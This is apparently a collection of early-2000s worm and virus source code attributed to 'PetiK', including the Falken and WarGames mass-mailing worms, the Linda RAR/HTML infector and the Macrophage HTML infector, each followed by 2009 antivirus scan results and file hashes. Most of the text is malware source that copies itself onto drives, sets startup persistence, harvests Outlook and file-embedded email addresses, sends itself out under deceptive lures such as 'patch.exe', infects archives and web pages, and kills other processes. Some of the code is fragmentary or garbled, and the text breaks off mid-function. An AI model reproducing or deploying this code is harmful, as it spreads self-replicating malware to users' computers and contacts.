a-squared 4.0.0.101 2009.05.16 Trojan-Downloader.Win32.Small!IK
Authentium 5.1.2.4 2009.05.15 W32/Malware!76bd
Avast 4.8.1335.0 2009.05.15 Win32:Extract
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.I@mm
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.Y
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
F-Prot 4.4.4.56 2009.05.15 W32/Malware!76bd
GData 19 2009.05.16 Win32.Petik.I@mm
Ikarus T3.1.1.49.0 2009.05.16 Trojan-Downloader.Win32.Small
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.Y@mm
NOD32 4080 2009.05.15 Win32/Petik.Y
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.5632.C
Panda 10.0.0.14 2009.05.16 W32/Extract
PCTools 4.4.2.0 2009.05.15 I-Worm.Tractex.A
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.k
Sophos 4.41.0 2009.05.16 W32/Petik-L
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.L
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Extract
MD5...: f6c5adc3869b24363a81d283908a9978
SHA1..: 8451ec7b8f6b487cd39d3d5ea9acdafc27116b28
comment #
Name : I-Worm.Falken
Author : PetiK
Date : February 5th 2002 - February 8th 2002
Size : 6144
Action :
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
start_worm:
xchg eax,ebx
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
kern CloseHandle
kern CopyFileA
kern CreateFileA
kern CreateFileMappingA
kern DeleteFileA
kern GetFileSize
kern GetModuleFileNameA
kern GetSystemDirectoryA
kern GetTickCount
kern GetWindowsDirectoryA
kern lstrcat
kern MapViewOfFile
kern SetCurrentDirectoryA
kern SetFilePointer
kern Sleep
kern UnmapViewOfFile
kern WinExec
kern WriteFile
kern WritePrivateProfileStringA
kern WriteProfileStringA
push 50
push esi
push 0
call _ptkGetModuleFileNameA
push edi
push 50
push edi
add edi,eax
mov al,"\"
stosb
call _ptkGetTickCount
push 9
pop ecx
xor edx,edx
div ecx
inc edx
mov ecx,edx
copy_g:
push ecx
push 'z'-'a'
pop ecx
xor edx,edx
div ecx
xchg eax,edx
add al,'a'
stosb
push 100
pop ecx
xor edx,edx
div ecx
push edx
call _ptkSleep
pop ecx
loop copy_g
mov eax,"exe."
stosd
pop edi
push 50
push offset wininit
@pushsz "\WININIT.INI"
push offset wininit
call _ptklstrcat
push offset wininit
push esi
@pushsz "NUL"
@pushsz "rename"
call _ptkWritePrivateProfileStringA
copy_w: push 0
push edi
push esi
call _ptkCopyFileA
run_w: push edi

@pushsz "RUN"
@pushsz "WINDOWS"
call _ptkWriteProfileStringA
spread_system:
call @lect
db "D:\",0
db "E:\",0
db "F:\",0
db "G:\",0
db "H:\",0
db "I:\",0
db "J:\",0
db "K:\",0
db "L:\",0
db "M:\",0
db "N:\",0
db "O:\",0
db "P:\",0
db "Q:\",0
db "R:\",0
db "S:\",0
db "T:\",0
db "U:\",0
db "V:\",0
db "W:\",0
db "X:\",0
db "Y:\",0
db "Z:\",0
@lect:
pop esi
push 23
pop ecx
loop_lect:
push ecx
push esi
push 0
@pushsz "winbackup.exe"
call _ptkCopyFileA
@endsz
pop ecx
loop loop_lect
end_spread_system:
payload:
xor edx,edx
mov ecx,20
div ecx
cmp edx,2
jne end_payload
push 10h
@pushsz "I-Worm.Falken"
call @messpay
db "This is the last warning before the attack.",CRLF
db "United States have to stop controling the world.",0
@messpay:
push 0
api MessageBoxA
end_payload:
prep_spread_worm:
push 0
push 20h
push 2
push 0
push 1
push 40000000h
@pushsz "C:\falken.vbs"
xchg eax,ebx
push 0
push offset octets
push e_vbs - s_vbs
push offset s_vbs
push ebx
call _ptkWriteFile
push ebx
push 1
@pushsz "wscript C:\falken.vbs"
call _ptkWinExec
push 2000
call _ptkSleep
@pushsz "C:\falken.vbs"
verif_inet:
push 0
push offset inet
dec eax
jnz verif_inet
push 50
push offset syspath
push offset syspath
spread: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "falkenspread.txt"
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
call _ptkCreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
call _ptkMapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
call _ptkGetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: mov counter,0
end_l: xor al,al
stosb
inc counter
cmp counter,20
jne end_l
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:
end_s3: push esi

call _ptkUnmapViewOfFile
end_s2: push ebp
end_s1: push ebx
end_spread: popad
@pushsz "falkenspread.txt"
end_worm:
push 0
api ExitProcess
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
push 0
push 80h
push 4
push 0
push 1
push 40000000h
@pushsz "falkenliste.txt"
xchg eax,ebx
push 2
push 0
push 0
push ebx
call _ptkSetFilePointer
push 0
push offset octets
push e_liste - s_liste
push offset s_liste
push ebx
call _ptkWriteFile
push ebx
ret
.data
wininit db 50 dup (0)
lect db 50 dup (0)
syspath db 50 dup (0)
octets dd ?
counter dd ?
inet dd 0
sess dd 0
subject db "Last Warning !",0

body db "Message for Everybody,",CRLF
db "Open this file to see what we speak about.",CRLF,CRLF
db 9,"Best Regards",0
filename db "open.exe",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
szCopyFileA db "CopyFileA",0
szCreateFileMappingA db "CreateFileMappingA",0
szDeleteFileA db "DeleteFileA",0
szGetFileSize db "GetFileSize",0
szGetModuleFileNameA db "GetModuleFileNameA",0
szGetSystemDirectoryA db "GetSystemDirectoryA",0
szGetTickCount db "GetTickCount",0
szGetWindowsDirectoryA db "GetWindowsDirectoryA",0
szlstrcat db "lstrcat",0
szMapViewOfFile db "MapViewOfFile",0
szSetCurrentDirectoryA db "SetCurrentDirectoryA",0
szSetFilePointer db "SetFilePointer",0
szSleep db "Sleep",0
szUnmapViewOfFile db "UnmapViewOfFile",0
szWinExec db "WinExec",0
szWritePrivateProfileStringA db "WritePrivateProfileStringA",0
szWriteProfileStringA db "WriteProfileStringA",0
_ptkCopyFileA dd ?
_ptkCreateFileMappingA dd ?
_ptkDeleteFileA dd ?
_ptkGetFileSize dd ?
_ptkGetModuleFileNameA dd ?
_ptkGetSystemDirectoryA dd ?
_ptkGetTickCount dd ?
_ptkGetWindowsDirectoryA dd ?
_ptklstrcat dd ?
_ptkMapViewOfFile dd ?
_ptkSetCurrentDirectoryA dd ?
_ptkSetFilePointer dd ?
_ptkSleep dd ?
_ptkUnmapViewOfFile dd ?
_ptkWinExec dd ?
_ptkWriteFile dd ?
_ptkWritePrivateProfileStringA dd ?
_ptkWriteProfileStringA dd ?
db 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set sys=fs.GetSpecialFolder(1)',CRLF
db 'Set c=fs.CreateTextFile(sys&"\falkenspread.txt")',CRLF
db 'c.Close',CRLF
db 'Set ou=CreateObject("Outlook.Application")',CRLF
db 'Set map=ou.GetNameSpace("MAPI")',CRLF
db 'adr=""',CRLF
db 'For Each mel in map.AddressLists',CRLF
db 'If mel.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mel.AddressEntries.Count',CRLF
db 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'Set c=fs.OpenTextFile(sys&"\falkenspread.txt",2)',CRLF
db 'c.Close',CRLF
e_vbs:
s_liste:
db "mailto : > "
mail_addr db 50 dup (0)
db " ",CRLF
e_liste:
end start_worm
end
File Falken.exe received on 05.16.2009 11:58:11 (CET)
AhnLab-V3 5.0.0.2 2009.05.15 Win32/Pettick.worm.6144
Authentium 5.1.2.4 2009.05.15 W32/NewMalware-NetWatcher!Eldorado
Avast 4.8.1335.0 2009.05.15 Win32:Falkon
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Win32.Petik.G@mm
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.AC
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eTrust-Vet 31.6.6508 2009.05.16 Win32/Falcon.A
F-Prot 4.4.4.56 2009.05.15 W32/NewMalware-NetWatcher!Eldorado
GData 19 2009.05.16 Win32.Petik.G@mm
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.Z@mm
NOD32 4080 2009.05.15 Win32/Petik.AC
PCTools 4.4.2.0 2009.05.15 I-Worm.Tractex.B
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.j
Sophos 4.41.0 2009.05.16 W32/Petik-P
TrendMicro 8.950.0.1092 2009.05.15 WORM_FALKEN.A
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Falken
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Tractex.B
MD5...: f19278caf2e95e3abd31ad269e1b0814
SHA1..: 4b202c2aabe0a59addf103626cfb304835ecda2e
comment §
Name : W32.Linda
Data : February 13th 2002
Author : PetiK
Language : Win32asm
Size : 8192 (compressed with ASPack).
Action : Infects rar files and ht* files in the current directory.
.386
locals
jumps
.model flat,STDCALL
api macro x
extrn x:proc
call x
endm
dwFileAttributes dd 0
ftCreationTime dd ?,?
ftLastAccessTime dd ?,?
ftLastWriteTime dd ?,?
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0,0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
db 2 dup (0)
.DATA
CRLF equ <13,10>
ffile WIN32_FIND_DATA <?>
sysTime db 16 dup(0)
orig_virus db 50 dup (0)

thFile dd ?
Err dd 0
time0 dd 0,0
time1 dd 0,0
time2 dd 0,0
Size equ 8192

HeaderSize = EndRARHeader-RARHeader
rarmask db "*.rar",0
htmmask db "*.ht*",0
hFile dd ?
fHnd dd ?
mHnd dd ?
sizer dd 0
octets dd 0
RARHeader:
RARHeaderCRC dw 0
RARType db 74h
RARFlags dw 8000h
RARHSize dw HeaderSize
RARCompressed dd Size
RAROriginal dd Size
RAROs db 0
RARCrc32 dd 0
RARFileTime db 63h,78h
RARFileDate db 31h,24h
RARNeedVer db 14h
RARMethod db 30h
RARFNameSize dw EndRARHeader-RARName
RARAttrib dd 0
RARName db "LINDA32.EXE"
EndRARHeader label byte
.CODE
start_linda:
mov eax,offset sysTime
push eax
api GetSystemTime
lea eax,sysTime
cmp word ptr [eax+2],8 ; August
jne end_pay
cmp word ptr [eax+6],10 ; 10th. Linda's Birthday
jne end_pay
push 40h
call @tit
db "W32RAR.Linda",0
@tit:
call @mes
db "This virus infects only RAR files.",0dh,0ah
db "Happy Birthday - (c)2002",0
@mes:
push 0
api MessageBoxA
end_pay:
push 50
mov esi,offset orig_virus
push esi
push 0
push 4
push 1000h
push 8192
push 0
api VirtualAlloc
test eax,eax
je end_srch_rar
mov dword ptr [mHnd],eax
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset orig_virus
api CreateFileA
cmp eax,-1
je end_srch_rar
mov dword ptr [fHnd],eax
push 0
mov dword ptr [sizer],0
lea eax,sizer
push eax
push 8192
push dword ptr [mHnd]
push dword ptr [fHnd]
api ReadFile
api CloseHandle
rar_srch:
push offset ffile
push offset rarmask
api FindFirstFileA
dec eax
jz end_srch_rar
inc eax
mov dword ptr [hFile],eax
inf_rar:
call times
call infect
cmp byte ptr [Err],1
je rar_nxt_srch
call timer
rar_nxt_srch:
push offset ffile
mov eax,dword ptr [hFile]
push eax
api FindNextFileA
test eax,eax
jnz inf_rar
push eax
api FindClose
end_srch_rar:
htm_srch:
push offset ffile
push offset htmmask
api FindFirstFileA
dec eax
jz end_srch_htm
inc eax
mov dword ptr [hFile],eax
inf_htm:
call infecthtm
htm_nxt_srch:
push offset ffile
push eax
api FindNextFileA
test eax,eax
jnz inf_htm
push eax
api FindClose
end_srch_htm:
end_linda:
push 0
api ExitProcess
times: push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je tserr
mov dword ptr [thFile],eax
push offset time0
push offset time1
push offset time2
push dword ptr [thFile]
api GetFileTime
api CloseHandle
mov byte ptr [Err],0
ret
tserr: mov byte ptr [Err],1
ret
timer: push 0
push 80h
push 3
push 0
push 1
push 40000000h
api CreateFileA
cmp eax,-1
je trerr
mov dword ptr [thFile],eax
push offset time0
push offset time1
push offset time2
api SetFileTime
api CloseHandle
trerr: ret
infecthtm:
api GetFileAttributesA
cmp eax,1 or 20h
je end_inf_htm
push 0
push 80h
push 3
push 0
push 1
push 40000000h
api CreateFileA
cmp eax,-1
je end_inf_htm
push 2
push 0
api _llseek
push 0
push offset octets
push e_htm - s_htm
call e_htm
s_htm: db "",CRLF,CRLF
db "<SCRIPT Language=VBScript>",CRLF
db "On Error Resume Next",CRLF
db "document.Write ""<font face='verdana' color=green size='2'>Hi guy ! How
are you ?"
db "<br>If you read these lines, is that you are infected by my Virus Linda."
db "<br>Look at your RAR files. They could be infected too."
db "<br>Good Bye and have a nice day.<br></font>""",0dh,0ah
e_htm:
api WriteFile
api CloseHandle
push 1 or 20h
api SetFileAttributesA
end_inf_htm:
ret
infect: xor eax,eax

push eax
push 80h
push 3
push eax
push eax
push 40000000h
lea eax,ffile.cFileName
push eax
api CreateFileA
dec eax
jz end_infect
inc eax
push 2
push 0
api _llseek ; like SetFilePointer
mov esi,dword ptr [mHnd]

mov edi,Size
call CRC32
mov dword ptr [RARCrc32],eax
mov esi,offset RARHeader+2

mov edi,HeaderSize-2
call CRC32
mov word ptr [RARHeaderCRC],ax
xor eax,eax
push eax
push offset octets
push HeaderSize
push offset RARHeader
api WriteFile
mov dword ptr [RARHeaderCRC],0

mov dword ptr [RARCrc32],0
mov dword ptr [RARCrc32+2],0
push 0
push offset octets
push Size
api WriteFile
api CloseHandle
end_infect:
ret
CRC32: cld
push ebx
mov ecx,-1 ;xor ecx,ecx & dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0edb8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec di
jnz NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
ret
ends
end start_linda
File w32linda32.exe received on 05.16.2009 19:48:06 (CET)

a-squared 4.0.0.101 2009.05.16 Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Petik.worm.8192.C
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AP1
Authentium 5.1.2.4 2009.05.16 W32/Malware!c1a4
Avast 4.8.1335.0 2009.05.15 Win32:Agent-XPK
AVG 8.5.0.336 2009.05.15 Worm/Linda
BitDefender 7.2 2009.05.16 Win32.Linda.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 Win32.Linda
Comodo 1157 2009.05.08 Worm.Win32.Petik.Linda
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.4096
eSafe 7.0.17.0 2009.05.14 Win32.Petik
eTrust-Vet 31.6.6508 2009.05.16 HTML/Linad
F-Prot 4.4.4.56 2009.05.16 W32/Malware!c1a4
F-Secure 8.0.14470.0 2009.05.15 Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik!worm.p2p
GData 19 2009.05.16 Win32.Linda.A
Ikarus T3.1.1.49.0 2009.05.16 Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/Linda.worm
McAfee+Artemis 5616 2009.05.15 W32/Linda.worm
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AP1
Microsoft 1.4602 2009.05.16 Worm:Win32/Linra.A
NOD32 4080 2009.05.15 Win32/Petik.Linda
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8192.E
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 Univ.AP.F
Rising 21.29.52.00 2009.05.16 Worm.Win32.Petik.a
Sophos 4.41.0 2009.05.16 W32/Petik-S
Sunbelt 3.2.1858.2 2009.05.16 Worm.Win32.Petik
TrendMicro 8.950.0.1092 2009.05.15 PE_LINDA.A
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik
ViRobot 2009.5.15.1737 2009.05.15 Worm.Win32.Petik.8192
VirusBuster 4.6.5.0 2009.05.16 Worm.Petik.AG
MD5...: 2bdfd3609d98f54cc1c8fc7e3f5e925c
SHA1..: 1e1c42c4d1cefd930ca37e60ba8689f3d0da174c
PEiD..: ASPack v2.12
<macrophage>
<html><head><title>Internet Explo$er</title></head><body>
<script language=vbscript>
set fso=createobject("scripting.filesystemobject")
If err.number=429 then
document.write "<font face='Lucida Console' size='2' color=black>You need ActiveX enabled
to see this file<br><a href='javascript:location.reload()'>Click Here</a> to reload and
click Yes</font>"
Else
cache=ws.RegRead
Folders\Cache")
cook=ws.RegRead
Folders\Cookies")
desk=ws.RegRead
Folders\Desktop")
favor=ws.RegRead
Folders\Favorites")
pers=ws.RegRead
Folders\Personal")
infect(fso.GetSpecialFolder(0))
infect(cache)
infect(cook)
infect(desk)
infect(favor)
infect(pers)
If Day(Now())=10 Then
document.write "<font face='verdana' size='2' color=black>Sorry but your browser can't
read this page.<br>Try an another day.<br></font>"
document.write "<font face='verdana' size='2' color=blue><br>GOOD BYE and HAVE A NICE
DAY.</font>"
End If
End If
Function infect(doss)
Set FolderObj = FSO.GetFolder(doss)
ext = lcase(FSO.GetExtensionName(cible.Name))
if ext="htm" or ext="html" or ext="htz" or ext="hta" or ext="asp" Then
Set good = fso.OpenTextFile(cible.path, 1, False)
if good.readline <> "<macrophage>" Then
good.close()
htmorg = good.ReadAll()
good.close()
Set good = fso.CreateTextFile(cible.path, True, False)
good.WriteLine "<macrophage>"
good.Write(htmorg)
good.WriteLine virus.htmltext
good.Close()
else
good.close()
end if
end if
next
End Function
</script></html>
File Macrophage.htm received on 05.16.2009 17:51:50 (CET)
a-squared 4.0.0.101 2009.05.16 Virus.VBS.Petik!IK
AntiVir 7.9.0.168 2009.05.15 VBS/Petik.Good
Authentium 5.1.2.4 2009.05.16 VBS/Petik.K
AVG 8.5.0.336 2009.05.15 VBS/Rophage.A
BitDefender 7.2 2009.05.16 VBS.Petik.A
CAT-QuickHeal 10.00 2009.05.15 VBS/Petik.K
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Macrophage
eSafe 7.0.17.0 2009.05.14 VBS.Petik.a.
eTrust-Vet 31.6.6508 2009.05.16 VBS/Rophage
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.K
F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.K
GData 19 2009.05.16 VBS.Petik.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.VBS.Petik
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Petik
McAfee 5616 2009.05.15 VBS/Rophage
McAfee+Artemis 5616 2009.05.15 VBS/Rophage
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Petik.Good
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik
NOD32 4080 2009.05.15 VBS/Petik.B
Norman 6.01.05 2009.05.16 VBS/Petik.C
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.A
Panda 10.0.0.14 2009.05.16 HTML/Mage
PCTools 4.4.2.0 2009.05.16 VBS.Acroph.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.Petik
Sophos 4.41.0 2009.05.16 -
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Prepend
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.B
VBA32 3.12.10.5 2009.05.16 Virus.VBS.Petik
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.Acroph.A
MD5...: fee8a8a543264ddb70fa00cfbd10625b
SHA1..: 800f9ec17e06d88ecbe5979289e4f67847770561
/*
Name : I-Worm.WarGames
Author : PetiK
Date : February 12th 2002 - February 22th 2002
Language : C++/Win32asm
*/
#include <stdio.h>
#include <mapi.h>
#pragma argused
#pragma inline
char filename[100],sysdir[100],copyr[50]="w",winhtm[100],subj[50];
int num,counter=0;
char *alph[]={"a","b","c","d","e","f","g","h","i","j","k","l","m",
"n","o","p","q","r","s","t","u","v","w","x","y","z"};
char dn[20]="Wargames Uninstall",ust[40]="rundll32 mouse,disable";
LPSTR
Folders";
BYTE desktop[50],favoris[50],personal[50],cache[50],page[150];
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),spage=sizeof(page);
DWORD type=REG_SZ;
FILE *vbsworm,*winstart;
HANDLE lSnapshot,myproc;
BOOL rProcessFound;
LHANDLE session;
MapiMessage mess;
MapiMessage *mes;
MapiRecipDesc from;
HINSTANCE hMAPI;
HKEY hReg;
SYSTEMTIME wartime;

void FindFile(char *,char *);
void GetMail(char *,char *);
void sendmail(char *);

{
// Kill Some AntiVirus
// Kill Some Worm

StopAV("KERN32.EXE"); // I-Worm.Badtrans
StopAV("SETUP.EXE"); // I-Worm.Cholera
StopAV("RUNDLLW32.EXE"); // I-Worm.Gift
StopAV("GONER.SCR"); // I-Worm.Goner
StopAV("LOAD.EXE"); // I-Worm.Nimda
StopAV("INETD.EXE"); // I-Worm.Plage - BadTrans
StopAV("FILES32.VXD"); // I-Worm.PrettyPark
StopAV("SCAM32.EXE"); // I-Worm.Sircam
StopAV("GDI32.EXE"); // I-Worm.Sonic
StopAV("_SETUP.EXE"); // I-Worm.ZippedFiles
StopAV("EXPLORE.EXE"); // I-Worm.ZippedFiles
StopAV("ZIPPED_FILES.EXE"); // I-Worm.ZippedFiles
SetCurrentDirectory(sysdir);
CopyFile(filename,"article.doc.exe",TRUE);
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\
\WarGames Worm",&hReg);
RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
RegCloseKey(hReg);
randomize();
num=rand() % 10;
randname:
strcat(copyr,alph[GetTickCount()%25]);
if(++counter==num) {
strcat(copyr,".exe");
MessageBox(NULL,copyr,"New Copy Name:",MB_OK|MB_ICONINFORMATION);
CopyFile(filename,copyr,FALSE);
WriteProfileString("WINDOWS","RUN",copyr);
WritePrivateProfileString("rename","NUL",filename,"WININIT.INI");
goto endrandname;
}
Sleep(GetTickCount()%100);
goto randname;
endrandname:
RegCloseKey(hReg);
GetWindowsDirectory((char *)winhtm,100);
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
FindFile(desktop,"*.htm");
FindFile(desktop,"*.doc");
FindFile(favoris,"*.ht*");
FindFile(personal,"*.ht*");
FindFile(personal,"*.doc");
FindFile(personal,"*.xls");
FindFile(personal,"*.asp");
FindFile(cache,".ht*");
FindFile(cache,".php");
FindFile(cache,".asp");
FindFile(winhtm,".ht*");
FindFile(winhtm,".doc");
vbsworm=fopen("wargames.vbs","w");
fprintf(vbsworm,"On Error Resume Next\n");
fprintf(vbsworm,"msgbox %cScripting.FileSystemObject%c\n",34,34);
fprintf(vbsworm,"Set sf=CreateObject(%cScripting.FileSystemObject%c)\n",34,34);
fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");
fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34);
fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
fprintf(vbsworm,"For Each C In MA.AddressLists\n");
fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
fprintf(vbsworm,"EM.To=AD.Address\n");
fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c read this.%c\n",34,34,34,34);
fprintf(vbsworm,"body=%cI found this on the web and it is important.%c\n",34,34);
fprintf(vbsworm,"body = body & VbCrLf & %cOpen the attached file and read.%c\n",34,34);
fprintf(vbsworm,"EM.Body=body\n");
fprintf(vbsworm,"EM.Attachments.Add(sys&%c\\article.doc.exe%c)\n",34,34);
fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
fprintf(vbsworm,"EM.Send\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fclose(vbsworm);
ShellExecute(NULL,"open","wargames.vbs",NULL,NULL,SW_SHOWNORMAL);
Sleep(5000);
DeleteFile("wargames.vbs");

do {
MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);
mes->ulReserved=0;
mes->lpszSubject="Re: Fw:";
mes->lpszNoteText="I received your mail but I cannot reply immediatly.\n"
"I send you a nice program. Look at this.\n\n"
" See you soon.";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
mes->lpRecips->lpszName=mname;
mes->lpRecips->lpszAddress=maddr;
mes->nFileCount=1;
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
mes->lpFiles->ulReserved=0;
mes->lpFiles->flFlags=NULL;
mes->lpFiles->nPosition=-1;
mes->lpFiles->lpszPathName=filename;
mes->lpFiles->lpszFileName="funny.exe";
mes->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mes, NULL, NULL);
}
free(mes->lpFiles);
mFreeBuffer(mes);
FreeLibrary(hMAPI);
}
void FindFile(char *folder, char *ext)

{
char mail[128];
hFile=FindFirstFile(ext,&ffile);
while(abc) {
SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
GetMail(ffile.cFileName,mail);
if(strlen(mail)>0) {
sendmail(mail);
}
}
}

{
HANDLE hf,hf2;
char *mapped;
DWORD size,i,k;
BOOL test=FALSE,valid=FALSE;
mail[0]=0;
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIV
E,0);
return;
size=GetFileSize(hf,NULL);
if(!size)
return;
if(size<8)
return;
size-=100;
if(!hf2) {
CloseHandle(hf);
return;
}
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}
i=0;
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
test=TRUE;
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@')
valid=TRUE;
}
i++;
}
mail[k]=0;
} else
i++;
}
if(!valid)
mail[0]=0;
CloseHandle(hf2);
CloseHandle(hf);
return;
}

{
wsprintf(subj,"Mail to %s.",tos);
from.lpszName=NULL;
mess.lpszSubject=subj;
mess.lpszNoteText="I send you this patch.\n"
"It corrects a bug into Internet Explorer and Outlook.\n\n"
" Have a nice day. Best Regards.";
if(!mess.lpRecips)
return;
mess.lpRecips->lpszName=tos;
mess.nRecipCount=1;
if(!mess.lpFiles)
return;
mess.lpFiles->lpszPathName=filename;
mess.lpFiles->lpszFileName="patch.exe";
mess.nFileCount=1;
mSendMail(0,0,&mess,0,0);
free(mess.lpFiles);
}

{
register BOOL term;
if(strstr(uProcess.szExeFile,antivirus)!=NULL) {
